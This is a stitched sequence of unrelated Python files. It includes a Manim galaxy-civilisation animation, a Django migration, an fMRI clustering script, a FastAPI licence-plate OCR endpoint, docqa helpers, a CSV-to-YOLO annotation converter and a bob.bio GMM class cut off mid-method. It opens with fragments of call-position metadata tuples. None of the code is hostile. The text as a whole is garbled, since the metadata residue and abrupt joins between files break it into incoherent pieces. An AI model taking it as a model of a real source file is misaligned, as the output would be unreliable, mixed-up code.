'os.path.join', (['file_dir', '"""data/CTNNB1.bed"""'], {}), "(file_dir, 'data/CTNNB1.bed')\n", (2035, 2064), False, 'import os\n'), ((2265, 2313), 'prob2020.python.mutation_context.get_aa_mut_info', 'mc.get_aa_mut_info', (['coding_pos', 'somatic_base', 'gs'], {}), '(coding_pos, somatic_base, gs)\n', (2283, 2313), True, 'import prob2020.python.mutation_context as mc\n'), ((3462, 3475), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (3469, 3475), True, 'import prob2020.console.randomization_test as pt\n'), ((3562, 3604), 'numpy.sum', 'np.sum', (["(result['entropy BH q-value'] < 0.1)"], {}), "(result['entropy BH q-value'] < 0.1)\n", (3568, 3604), True, 'import numpy as np\n'), ((3780, 3852), 'os.path.join', 'os.path.join', (['file_dir', '"""output/100genes_position_no_context_output.txt"""'], {}), "(file_dir, 'output/100genes_position_no_context_output.txt')\n", (3792, 3852), False, 'import os\n'), ((3866, 3879), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (3873, 3879), True, 'import prob2020.console.randomization_test as pt\n'), ((3966, 4008), 'numpy.sum', 'np.sum', (["(result['entropy BH q-value'] < 0.1)"], {}), "(result['entropy BH q-value'] < 0.1)\n", (3972, 4008), True, 'import numpy as np\n'), ((4190, 4257), 'os.path.join', 'os.path.join', (['file_dir', '"""output/100genes_position_dinuc_output.txt"""'], {}), "(file_dir, 'output/100genes_position_dinuc_output.txt')\n", (4202, 4257), False, 'import os\n'), ((4271, 4284), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (4278, 4284), True, 'import prob2020.console.randomization_test as pt\n'), ((4371, 4413), 'numpy.sum', 'np.sum', (["(result['entropy BH q-value'] < 0.1)"], {}), "(result['entropy BH q-value'] < 0.1)\n", (4377, 4413), True, 'import numpy as np\n'), ((425, 465), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.fa"""'], {}), "(file_dir, 'data/CTNNB1.fa')\n", (437, 465), False, 'import os\n'), ((486, 527), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.bed"""'], {}), "(file_dir, 'data/CTNNB1.bed')\n", (498, 527), False, 'import os\n'), ((554, 605), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1_mutations.txt"""'], {}), "(file_dir, 'data/CTNNB1_mutations.txt')\n", (566, 605), False, 'import os\n'), ((629, 679), 'os.path.join', 'os.path.join', (['file_dir', '"""output/CTNNB1_output.txt"""'], {}), "(file_dir, 'output/CTNNB1_output.txt')\n", (641, 679), False, 'import os\n'), ((853, 890), 'os.path.join', 'os.path.join', (['file_dir', '"""data/scores"""'], {}), "(file_dir, 'data/scores')\n", (865, 890), False, 'import os\n'), ((2696, 2738), 'os.path.join', 'os.path.join', (['file_dir', '"""data/100genes.fa"""'], {}), "(file_dir, 'data/100genes.fa')\n", (2708, 2738), False, 'import os\n'), ((2759, 2802), 'os.path.join', 'os.path.join', (['file_dir', '"""data/100genes.bed"""'], {}), "(file_dir, 'data/100genes.bed')\n", (2771, 2802), False, 'import os\n'), ((2829, 2882), 'os.path.join', 'os.path.join', (['file_dir', '"""data/100genes_mutations.txt"""'], {}), "(file_dir, 'data/100genes_mutations.txt')\n", (2841, 2882), False, 'import os\n'), ((2906, 2978), 'os.path.join', 'os.path.join', (['file_dir', '"""output/100genes_position_single_nuc_output.txt"""'], {}), "(file_dir, 'output/100genes_position_single_nuc_output.txt')\n", (2918, 2978), False, 'import os\n'), ((3250, 3287), 'os.path.join', 'os.path.join', (['file_dir', '"""data/scores"""'], {}), "(file_dir, 'data/scores')\n", (3262, 3287), False, 'import os\n'), ((2092, 2123), 'prob2020.python.utils.bed_generator', 'utils.bed_generator', (['ctnnb1_bed'], {}), '(ctnnb1_bed)\n', (2111, 2123), True, 'import prob2020.python.utils as utils\n')] |
from manim import *
import Galaxy
from array import array
class DarkForest(Scene):
def construct(self):
'''建议X:Y=7:4'''
GalSizeX = 35
GalSizeY = 20
GalCivilizations = 20
# reduce animation time
simple = True
self.Universe = Galaxy.Galaxy(GalSizeX, GalSizeY, GalCivilizations)
self.year = Text('')
self.txts = VGroup()
self.lines = VGroup()
self.CivLabels = {}
self.conveys = []
TConstantX = 7.0/GalSizeX
TConstantY = 7.0/GalSizeY
self.CivGroup = {}
self.updateAge()
self.initCivs(simple=simple)
self.initIR(simple=simple)
self.label()
# Begin Galaxy Development
while not self.Universe.end():
self.Universe.move()
# self.drawConvey()
for i in self.Universe.New:
self.addCiv(i)
self.Universe.New = []
self.drawRelations()
self.updateAge()
self.checkChangeAttitude()
self.drawIR()
self.checkDead()
# print(CivGroup)
self.ending()
# def drawConvey(self):
# for i in self.conveys:
# self.remove(i)
# self.conveys.remove(i)
# for civ in self.Universe.Civilizations:
# for i in civ.Conveys:
# if i.Distance >0:
# if i.Friend:
# c = ImageMobject('conveygreen.png')
# c.rotate((i.Angle-90)*DEGREES)
# c.move_to(i.transformCoord())
# c.scale(0.1)
# self.add(c)
# self.conveys.append(c)
# else:
# c = ImageMobject('conveyred.png')
# c.rotate((i.Angle-90)*DEGREES)
# c.move_to(i.transformCoord())
# c.scale(0.1)
# self.add(c)
# print(i.Rad)
# self.conveys.append(c)
def addCiv(self, civ):
self.CivGroup[civ] = VGroup(Dot(point=ORIGIN, radius=0.05))
if civ.Attitude == 1:
self.CivGroup[civ][0].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][0].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][0].set_color(YELLOW)
else:
self.CivGroup[civ][0].set_color(GREY)
self.play(FadeIn(self.CivGroup[civ][0]))
self.wait(0.1)
self.play(ApplyMethod(self.CivGroup[civ][0].shift, civ.transformCoord()), run_time=1)
IR = Ellipse(width=civ.IRadius*(6.8/self.Universe.Xsize), height=civ.IRadius*(3.886/self.Universe.Ysize), stroke_width=1)
self.CivGroup[civ].add(IR)
IR.move_to(civ.transformCoord())
if civ.Attitude == 1:
self.CivGroup[civ][1].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][1].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][1].set_color(YELLOW)
else:
self.CivGroup[civ][1].set_color(GREY)
self.play(Create(IR))
a = civ.Name[4:]
print(a)
try:
t = Text(a)
except Exception:
t = Text('No. ????')
t.scale(0.2)
t.next_to(self.CivGroup[civ][0], direction=RIGHT, )
self.add(t)
self.CivLabels[civ] = t
self.txts.add(t)
def drawRelations(self):
# self.play(FadeOut(self.lines))
for i in self.lines:
self.remove(i)
self.lines.remove(i)
for civ in self.Universe.Civilizations:
for war in civ.War:
l = Line(civ.transformCoord(), war.transformCoord(), stroke_width=0.8).set_color(RED)
self.lines.add(l)
self.add(l)
for ally in civ.Ally:
l = Line(civ.transformCoord(), ally.transformCoord(), stroke_width=0.8).set_color(GREEN)
self.lines.add(l)
self.add(l)
def ending(self):
self.play(FadeOut(self.txts))
self.play(FadeOut(self.lines))
self.remove(self.txts)
for civ in self.Universe.Civilizations:
self.play(FadeOut(self.CivGroup[civ]))
self.remove(self.CivGroup[civ])
civ = self.Universe.Civilizations[0]
self.WIN = Dot(radius=1)
if civ.Attitude == 1:
self.WIN.set_color(GREEN)
elif civ.Attitude == 2:
self.WIN.set_color(RED)
elif civ.Attitude == 3:
self.WIN.set_color(YELLOW)
else:
self.WIN.set_color(GREY)
self.play(FadeIn(self.WIN))
self.wait(2)
info = Text(f'{civ.Name}\nTech: {civ.Tech}\nPower: {round(civ.Power, 2)}\nAttitude: {civ.Attitude}')
info.scale(0.8)
self.play(ApplyMethod(self.WIN.move_to, LEFT*2.5), run_time=1)
info.next_to(self.WIN, direction=RIGHT, )
self.play(FadeIn(info))
self.wait(4)
self.play(FadeOut(info), FadeOut(self.WIN))
self.galaxyStats()
def galaxyStats(self):
logo = ImageMobject('galaxy.png', invert=True)
logo.scale(0.4)
t = ''
for i in self.Universe.Stats.keys():
t+= str(i)+': '+str(round(self.Universe.Stats[i],2))+'\n'
info = Text(t)
info.scale(0.8)
self.play(FadeIn(logo))
self.play(ApplyMethod(logo.move_to, LEFT*2))
info.next_to(logo, direction=RIGHT)
self.play(FadeIn(info))
self.wait()
def checkDead(self):
if(len(self.Universe.Dead)>0):
for civ in self.Universe.Dead:
self.play(FadeOut(self.CivGroup[civ][0]), FadeOut(self.CivGroup[civ][1]), FadeOut(self.CivLabels[civ]))
self.remove(self.CivGroup[civ])
self.CivGroup.pop(civ)
self.Universe.Dead.remove(civ)
def updateAge(self):
past = self.year
self.remove(past)
self.year = Text(f"{self.Universe.age*10}", aligned_edge=LEFT).set_color(WHITE)
self.year.shift(LEFT*6+UP*3)
self.add(self.year)
def checkChangeAttitude(self):
for civ in self.Universe.Civilizations:
if civ.Attitude == 1:
self.CivGroup[civ][0].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][0].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][0].set_color(YELLOW)
else:
self.CivGroup[civ][0].set_color(GREY)
def label(self):
for civ in self.Universe.Civilizations:
a = civ.Name[4:]
print(a)
try:
t = Text(a)
except Exception:
t = Text('No. ????')
t.scale(0.2)
# t.move_to(civ.transformCoord()+RIGHT*0.4)
t.next_to(self.CivGroup[civ][0], direction=RIGHT, )
self.add(t)
self.CivLabels[civ] = t
self.txts.add(t)
def drawIR(self):
for civ in self.Universe.Civilizations:
IR = Ellipse(width=civ.IRadius*(6.8/self.Universe.Xsize), height=civ.IRadius*(3.886/self.Universe.Ysize), stroke_width=1)
past = self.CivGroup[civ][1]
self.CivGroup[civ].remove(past)
self.remove(past)
self.CivGroup[civ].add(IR)
IR.move_to(civ.transformCoord())
if civ.Attitude == 1:
self.CivGroup[civ][1].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][1].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][1].set_color(YELLOW)
else:
self.CivGroup[civ][1].set_color(GREY)
self.add(IR)
# self.wait(0.5)
self.wait()
def initIR(self, simple=False):
for civ in self.Universe.Civilizations:
IR = Ellipse(width=civ.IRadius*(6.8/self.Universe.Xsize), height=civ.IRadius*(3.886/self.Universe.Ysize), stroke_width=1)
self.CivGroup[civ].add(IR)
IR.move_to(civ.transformCoord())
if civ.Attitude == 1:
self.CivGroup[civ][1].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][1].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][1].set_color(YELLOW)
else:
self.CivGroup[civ][1].set_color(GREY)
if not simple:
self.play(Create(IR))
else:
self.add(IR)
# self.wait(0.5)
self.wait()
def initCivs(self,simple=False):
if not simple:
for civ in self.Universe.Civilizations:
self.CivGroup[civ] = VGroup(Dot(point=ORIGIN, radius=0.05))
if civ.Attitude == 1:
self.CivGroup[civ][0].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][0].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][0].set_color(YELLOW)
else:
self.CivGroup[civ][0].set_color(GREY)
self.play(FadeIn(self.CivGroup[civ][0]))
self.play(ApplyMethod(self.CivGroup[civ][0].move_to, civ.transformCoord()), )
# self.wait(0.1)
self.wait(1)
else:
for civ in self.Universe.Civilizations:
self.CivGroup[civ] = VGroup(Dot(point=ORIGIN, radius=0.05))
if civ.Attitude == 1:
self.CivGroup[civ][0].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][0].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][0].set_color(YELLOW)
else:
self.CivGroup[civ][0].set_color(GREY)
self.CivGroup[civ][0].move_to(civ.transformCoord())
self.add(self.CivGroup[civ][0])
# Contruct Universe with initial Civilizations
# for i in Universe.Civilizations:
# CivDot[i] = Dot(point=[i.X, i.Y, 0], radius=0.08, )
# self.play(FadeIn(CivDot[i]))
| [
"Galaxy.Galaxy"
] | [((254, 305), 'Galaxy.Galaxy', 'Galaxy.Galaxy', (['GalSizeX', 'GalSizeY', 'GalCivilizations'], {}), '(GalSizeX, GalSizeY, GalCivilizations)\n', (267, 305), False, 'import Galaxy\n')] |
# Generated by Django 3.0 on 2020-12-05 01:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('register', '0017_auto_20201204_1939'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='profile_pic',
field=models.ImageField(blank=True, default='profile_images/blank-profile-picture-png.png', null=True, upload_to='profile_images/'),
),
]
| [
"django.db.models.ImageField"
] | [((345, 480), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'default': '"""profile_images/blank-profile-picture-png.png"""', 'null': '(True)', 'upload_to': '"""profile_images/"""'}), "(blank=True, default=\n 'profile_images/blank-profile-picture-png.png', null=True, upload_to=\n 'profile_images/')\n", (362, 480), False, 'from django.db import migrations, models\n')] |
from __future__ import absolute_import, division, print_function
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "functions"))
import time as time
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
from sklearn.feature_extraction.image import grid_to_graph
from sklearn.cluster import AgglomerativeClustering
from Image_Visualizing import present_3d, make_mask
# Relative path to subject 1 data
pathtodata = "../../../data/ds009/sub001/"
condition_location=pathtodata+"model/model001/onsets/task001_run001/"
location_of_images="../../../images/"
sys.path.append(os.path.join(os.path.dirname(__file__), "../functions/"))
data = np.load('cluster_mask.npy')
data_new = data[..., 10:13]
X = np.reshape(data_new, (-1, 1))
connectivity = grid_to_graph(n_x= data_new.shape[0], n_y = data_new.shape[1], n_z = data_new.shape[2])
st = time.time()
n_clusters = 7 # number of regions
ward = AgglomerativeClustering(n_clusters=n_clusters,
linkage='ward', connectivity=connectivity).fit(X)
label = np.reshape(ward.labels_, data_new.shape)
label_mean = np.zeros(n_clusters)
center = list()
#FIND THE AVERAGE T-VALUE PER CLUSTER
for j in range(n_clusters):
mask = label==j
index = np.where(mask)
center.append((np.mean(index[0]),np.mean(index[1]),np.mean(index[2])))
label_mean[j] =np.mean(data_new[mask])
#PRINT THE PLOTS
for i in range(data_new.shape[-1]):
plt.figure()
plt.imshow(data_new[...,i], cmap=plt.cm.gray)
for l in range(n_clusters):
plt.contour(label[...,i] == l, contours=1,
colors=[plt.cm.spectral(l / float(n_clusters)), ],linewidths= 0.4)
plt.xticks(())
plt.yticks(())
plt.savefig(location_of_images+"ward"+str(i)+'.png')
| [
"matplotlib.pyplot.imshow",
"numpy.mean",
"sklearn.cluster.AgglomerativeClustering",
"numpy.reshape",
"matplotlib.pyplot.xticks",
"sklearn.feature_extraction.image.grid_to_graph",
"numpy.where",
"os.path.dirname",
"numpy.zeros",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.yticks",
"numpy.load",
"time.time"
] | [((687, 714), 'numpy.load', 'np.load', (['"""cluster_mask.npy"""'], {}), "('cluster_mask.npy')\n", (694, 714), True, 'import numpy as np\n'), ((749, 778), 'numpy.reshape', 'np.reshape', (['data_new', '(-1, 1)'], {}), '(data_new, (-1, 1))\n', (759, 778), True, 'import numpy as np\n'), ((795, 882), 'sklearn.feature_extraction.image.grid_to_graph', 'grid_to_graph', ([], {'n_x': 'data_new.shape[0]', 'n_y': 'data_new.shape[1]', 'n_z': 'data_new.shape[2]'}), '(n_x=data_new.shape[0], n_y=data_new.shape[1], n_z=data_new.\n shape[2])\n', (808, 882), False, 'from sklearn.feature_extraction.image import grid_to_graph\n'), ((889, 900), 'time.time', 'time.time', ([], {}), '()\n', (898, 900), True, 'import time as time\n'), ((1056, 1096), 'numpy.reshape', 'np.reshape', (['ward.labels_', 'data_new.shape'], {}), '(ward.labels_, data_new.shape)\n', (1066, 1096), True, 'import numpy as np\n'), ((1111, 1131), 'numpy.zeros', 'np.zeros', (['n_clusters'], {}), '(n_clusters)\n', (1119, 1131), True, 'import numpy as np\n'), ((1247, 1261), 'numpy.where', 'np.where', (['mask'], {}), '(mask)\n', (1255, 1261), True, 'import numpy as np\n'), ((1356, 1379), 'numpy.mean', 'np.mean', (['data_new[mask]'], {}), '(data_new[mask])\n', (1363, 1379), True, 'import numpy as np\n'), ((1441, 1453), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1451, 1453), True, 'import matplotlib.pyplot as plt\n'), ((1458, 1504), 'matplotlib.pyplot.imshow', 'plt.imshow', (['data_new[..., i]'], {'cmap': 'plt.cm.gray'}), '(data_new[..., i], cmap=plt.cm.gray)\n', (1468, 1504), True, 'import matplotlib.pyplot as plt\n'), ((1670, 1684), 'matplotlib.pyplot.xticks', 'plt.xticks', (['()'], {}), '(())\n', (1680, 1684), True, 'import matplotlib.pyplot as plt\n'), ((1689, 1703), 'matplotlib.pyplot.yticks', 'plt.yticks', (['()'], {}), '(())\n', (1699, 1703), True, 'import matplotlib.pyplot as plt\n'), ((115, 140), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (130, 140), False, 'import os\n'), ((633, 658), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (648, 658), False, 'import os\n'), ((943, 1037), 'sklearn.cluster.AgglomerativeClustering', 'AgglomerativeClustering', ([], {'n_clusters': 'n_clusters', 'linkage': '"""ward"""', 'connectivity': 'connectivity'}), "(n_clusters=n_clusters, linkage='ward', connectivity\n =connectivity)\n", (966, 1037), False, 'from sklearn.cluster import AgglomerativeClustering\n'), ((1281, 1298), 'numpy.mean', 'np.mean', (['index[0]'], {}), '(index[0])\n', (1288, 1298), True, 'import numpy as np\n'), ((1299, 1316), 'numpy.mean', 'np.mean', (['index[1]'], {}), '(index[1])\n', (1306, 1316), True, 'import numpy as np\n'), ((1317, 1334), 'numpy.mean', 'np.mean', (['index[2]'], {}), '(index[2])\n', (1324, 1334), True, 'import numpy as np\n')] |
from fastapi import FastAPI, File, Depends, HTTPException
from pydantic import BaseModel, Field
import base64
import time
from recognize_service import RecognizeService
app = FastAPI()
class Base64Body(BaseModel):
b64Encoded: str = Field(..., title="Image encoded in Base64")
def get_numbers(file: bytes, recognize_service: RecognizeService):
start_time = time.time()
try:
lp_number, links = recognize_service.get_license_plate_number(file)
except Exception as e:
print(e)
raise HTTPException(
status_code=422, detail="Could not get license plate number"
)
end_time = time.time()
print("Time: ", end_time - start_time)
return {"licensePlateNumber": lp_number, "links": links}
def process_image_raw(
file: bytes = File(...),
recognize_service: RecognizeService = Depends(),
):
return get_numbers(file, recognize_service)
def process_image_base64(
b64: Base64Body,
recognize_service: RecognizeService = Depends(),
):
file = base64.b64decode(b64.b64Encoded)
return get_numbers(file, recognize_service)
@app.post("/ocr/base64")
async def recognize_characters_from_base64(
process_image: dict = Depends(process_image_base64),
):
return process_image
@app.post("/ocr/raw")
async def recognize_characters_from_raw_image(
process_image: dict = Depends(process_image_raw),
):
return process_image
@app.get("/")
async def healthcheck():
return "ok"
| [
"fastapi.FastAPI",
"fastapi.HTTPException",
"pydantic.Field",
"base64.b64decode",
"time.time",
"fastapi.File",
"fastapi.Depends"
] | [((177, 186), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (184, 186), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((240, 283), 'pydantic.Field', 'Field', (['...'], {'title': '"""Image encoded in Base64"""'}), "(..., title='Image encoded in Base64')\n", (245, 283), False, 'from pydantic import BaseModel, Field\n'), ((370, 381), 'time.time', 'time.time', ([], {}), '()\n', (379, 381), False, 'import time\n'), ((638, 649), 'time.time', 'time.time', ([], {}), '()\n', (647, 649), False, 'import time\n'), ((798, 807), 'fastapi.File', 'File', (['...'], {}), '(...)\n', (802, 807), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((851, 860), 'fastapi.Depends', 'Depends', ([], {}), '()\n', (858, 860), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((1004, 1013), 'fastapi.Depends', 'Depends', ([], {}), '()\n', (1011, 1013), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((1029, 1061), 'base64.b64decode', 'base64.b64decode', (['b64.b64Encoded'], {}), '(b64.b64Encoded)\n', (1045, 1061), False, 'import base64\n'), ((1207, 1236), 'fastapi.Depends', 'Depends', (['process_image_base64'], {}), '(process_image_base64)\n', (1214, 1236), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((1363, 1389), 'fastapi.Depends', 'Depends', (['process_image_raw'], {}), '(process_image_raw)\n', (1370, 1389), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((525, 600), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(422)', 'detail': '"""Could not get license plate number"""'}), "(status_code=422, detail='Could not get license plate number')\n", (538, 600), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n')] |
import argparse
from datetime import datetime
from os.path import join
from typing import List, TypeVar, Iterable
from docqa.data_processing.word_vectors import load_word_vectors
class ResourceLoader(object):
"""
Abstraction for models the need access to external resources to setup, currently just
for word-vectors.
"""
def __init__(self, load_vec_fn=load_word_vectors):
self.load_vec_fn = load_vec_fn
def load_word_vec(self, vec_name, voc=None):
return self.load_vec_fn(vec_name, voc)
class LoadFromPath(object):
def __init__(self, path):
self.path = path
def load_word_vec(self, vec_name, voc=None):
return load_word_vectors(join(self.path, vec_name), voc, True)
class CachingResourceLoader(ResourceLoader):
def __init__(self, load_vec_fn=load_word_vectors):
super().__init__(load_vec_fn)
self.word_vec = {}
def load_word_vec(self, vec_name, voc=None):
if vec_name not in self.word_vec:
self.word_vec[vec_name] = super().load_word_vec(vec_name)
return self.word_vec[vec_name]
def print_table(table: List[List[str]]):
""" Print the lists with evenly spaced columns """
# print while padding each column to the max column length
col_lens = [0] * len(table[0])
for row in table:
for i,cell in enumerate(row):
col_lens[i] = max(len(cell), col_lens[i])
formats = ["{0:<%d}" % x for x in col_lens]
for row in table:
print(" ".join(formats[i].format(row[i]) for i in range(len(row))))
T = TypeVar('T')
def transpose_lists(lsts: List[List[T]]) -> List[List[T]]:
return [list(i) for i in zip(*lsts)]
def max_or_none(a, b):
if a is None or b is None:
return None
return max(a, b)
def flatten_iterable(listoflists: Iterable[Iterable[T]]) -> List[T]:
return [item for sublist in listoflists for item in sublist]
def split(lst: List[T], n_groups) -> List[List[T]]:
""" partition `lst` into `n_groups` that are as evenly sized as possible """
per_group = len(lst) // n_groups
remainder = len(lst) % n_groups
groups = []
ix = 0
for _ in range(n_groups):
group_size = per_group
if remainder > 0:
remainder -= 1
group_size += 1
groups.append(lst[ix:ix + group_size])
ix += group_size
return groups
def group(lst: List[T], max_group_size) -> List[List[T]]:
""" partition `lst` into that the mininal number of groups that as evenly sized
as possible and are at most `max_group_size` in size """
if max_group_size is None:
return [lst]
n_groups = (len(lst)+max_group_size-1) // max_group_size
per_group = len(lst) // n_groups
remainder = len(lst) % n_groups
groups = []
ix = 0
for _ in range(n_groups):
group_size = per_group
if remainder > 0:
remainder -= 1
group_size += 1
groups.append(lst[ix:ix + group_size])
ix += group_size
return groups
def get_output_name_from_cli():
parser = argparse.ArgumentParser(description='')
parser.add_argument('--name', '-n', nargs=1, help='name of output to exmaine')
args = parser.parse_args()
if args.name:
out = join(args.name[0] + "-" + datetime.now().strftime("%m%d-%H%M%S"))
print("Starting run on: " + out)
else:
out = "out/run-" + datetime.now().strftime("%m%d-%H%M%S")
print("Starting run on: " + out)
return out
| [
"datetime.datetime.now",
"os.path.join",
"argparse.ArgumentParser",
"typing.TypeVar"
] | [((1570, 1582), 'typing.TypeVar', 'TypeVar', (['"""T"""'], {}), "('T')\n", (1577, 1582), False, 'from typing import List, TypeVar, Iterable\n'), ((3084, 3123), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '""""""'}), "(description='')\n", (3107, 3123), False, 'import argparse\n'), ((700, 725), 'os.path.join', 'join', (['self.path', 'vec_name'], {}), '(self.path, vec_name)\n', (704, 725), False, 'from os.path import join\n'), ((3415, 3429), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3427, 3429), False, 'from datetime import datetime\n'), ((3297, 3311), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3309, 3311), False, 'from datetime import datetime\n')] |
from os import path, makedirs
import os
import pandas as pd
import sys
import argparse
IMAGE_FOLDER = 'data/images'
DATA_CSV_FILE = 'images/out_data.csv'
YOLO_FILE = 'data/train.txt'
DATA_CLASSES='data/class.names'
def convert_Input_CSV_to_yolo(vott_df,labeldict=dict(zip(['Object'],[0,])),path='',target_name='data_train.txt',abs_path=False):
if not 'code' in vott_df.columns:
vott_df['code']=vott_df['label'].apply(lambda x: labeldict[x])
for col in vott_df[['xmin', 'ymin', 'xmax', 'ymax']]:
vott_df[col]=(vott_df[col]).apply(lambda x: round(x))
#Create Yolo Text file
last_image = ''
txt_file = ''
for index,row in vott_df.iterrows():
if not last_image == row['image']:
if abs_path:
txt_file +='\n'+row['image_path'] + ' '
else:
txt_file +='\n'+os.path.join(path,row['image']) + ' '
txt_file += ','.join([str(x) for x in (row[['xmin', 'ymin', 'xmax', 'ymax','code']].tolist())])
else:
txt_file += ' '
txt_file += ','.join([str(x) for x in (row[['xmin', 'ymin', 'xmax', 'ymax','code']].tolist())])
last_image = row['image']
file = open(target_name,"w")
file.write(txt_file[1:])
file.close()
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--IMAGE_FOLDER", type=str, default=IMAGE_FOLDER,help = "Image folder path")
parser.add_argument("--DATA_CSV_FILE", type=str, default=DATA_CSV_FILE,help = "Input CSV file that store data")
parser.add_argument("--YOLO_FILE", type=str, default=YOLO_FILE,help = "data train yolo file name" )
args = parser.parse_args()
multi_df = pd.read_csv(args.DATA_CSV_FILE)
labels = multi_df['label'].unique()
labeldict = dict(zip(labels,range(len(labels))))
multi_df.drop_duplicates(subset=None, keep='first', inplace=True)
train_path = args.IMAGE_FOLDER
convert_Input_CSV_to_yolo(multi_df,labeldict,path = train_path,target_name=args.YOLO_FILE)
file = open(DATA_CLASSES,"w")
SortedLabelDict = sorted(labeldict.items() , key=lambda x: x[1])
for elem in SortedLabelDict:
file.write(elem[0]+'\n')
file.close()
| [
"os.path.join",
"argparse.ArgumentParser",
"pandas.read_csv"
] | [((1342, 1367), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1365, 1367), False, 'import argparse\n'), ((1737, 1768), 'pandas.read_csv', 'pd.read_csv', (['args.DATA_CSV_FILE'], {}), '(args.DATA_CSV_FILE)\n', (1748, 1768), True, 'import pandas as pd\n'), ((871, 903), 'os.path.join', 'os.path.join', (['path', "row['image']"], {}), "(path, row['image'])\n", (883, 903), False, 'import os\n')] |
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
# <NAME> <<EMAIL>>
import logging
from multiprocessing.pool import ThreadPool
import numpy
import bob.core
import bob.io.base
import bob.learn.em
from bob.bio.base.algorithm import Algorithm
logger = logging.getLogger("bob.bio.gmm")
class GMM(Algorithm):
"""Algorithm for computing Universal Background Models and Gaussian Mixture Models of the features.
Features must be normalized to zero mean and unit standard deviation."""
def __init__(
self,
# parameters for the GMM
number_of_gaussians,
# parameters of UBM training
kmeans_training_iterations=25, # Maximum number of iterations for K-Means
gmm_training_iterations=25, # Maximum number of iterations for ML GMM Training
training_threshold=5e-4, # Threshold to end the ML training
variance_threshold=5e-4, # Minimum value that a variance can reach
update_weights=True,
update_means=True,
update_variances=True,
# parameters of the GMM enrollment
relevance_factor=4, # Relevance factor as described in Reynolds paper
gmm_enroll_iterations=1, # Number of iterations for the enrollment phase
responsibility_threshold=0, # If set, the weight of a particular Gaussian will at least be greater than this threshold. In the case the real weight is lower, the prior mean value will be used to estimate the current mean and variance.
INIT_SEED=5489,
# scoring
scoring_function=bob.learn.em.linear_scoring,
n_threads=None,
):
"""Initializes the local UBM-GMM tool chain with the given file selector object"""
# call base class constructor and register that this tool performs projection
Algorithm.__init__(
self,
performs_projection=True,
use_projected_features_for_enrollment=False,
number_of_gaussians=number_of_gaussians,
kmeans_training_iterations=kmeans_training_iterations,
gmm_training_iterations=gmm_training_iterations,
training_threshold=training_threshold,
variance_threshold=variance_threshold,
update_weights=update_weights,
update_means=update_means,
update_variances=update_variances,
relevance_factor=relevance_factor,
gmm_enroll_iterations=gmm_enroll_iterations,
responsibility_threshold=responsibility_threshold,
INIT_SEED=INIT_SEED,
scoring_function=str(scoring_function),
multiple_model_scoring=None,
multiple_probe_scoring="average",
)
# copy parameters
self.gaussians = number_of_gaussians
self.kmeans_training_iterations = kmeans_training_iterations
self.gmm_training_iterations = gmm_training_iterations
self.training_threshold = training_threshold
self.variance_threshold = variance_threshold
self.update_weights = update_weights
self.update_means = update_means
self.update_variances = update_variances
self.relevance_factor = relevance_factor
self.gmm_enroll_iterations = gmm_enroll_iterations
self.init_seed = INIT_SEED
self.rng = bob.core.random.mt19937(self.init_seed)
self.responsibility_threshold = responsibility_threshold
self.scoring_function = scoring_function
self.n_threads = n_threads
self.pool = None
self.ubm = None
self.kmeans_trainer = bob.learn.em.KMeansTrainer()
self.ubm_trainer = bob.learn.em.ML_GMMTrainer(
self.update_means,
self.update_variances,
self.update_weights,
self.responsibility_threshold,
)
def _check_feature(self, feature):
"""Checks that the features are appropriate"""
if (
not isinstance(feature, numpy.ndarray)
or feature.ndim != 2
or feature.dtype != numpy.float64
):
raise ValueError("The given feature is not appropriate")
if self.ubm is not None and feature.shape[1] != self.ubm.shape[1]:
raise ValueError(
"The given feature is expected to have %d elements, but it has %d"
% (self.ubm.shape[1], feature.shape[1])
)
#######################################################
# UBM training #
def train_ubm(self, array):
logger.debug(" .... Training with %d feature vectors", array.shape[0])
if self.n_threads is not None:
self.pool = ThreadPool(self.n_threads)
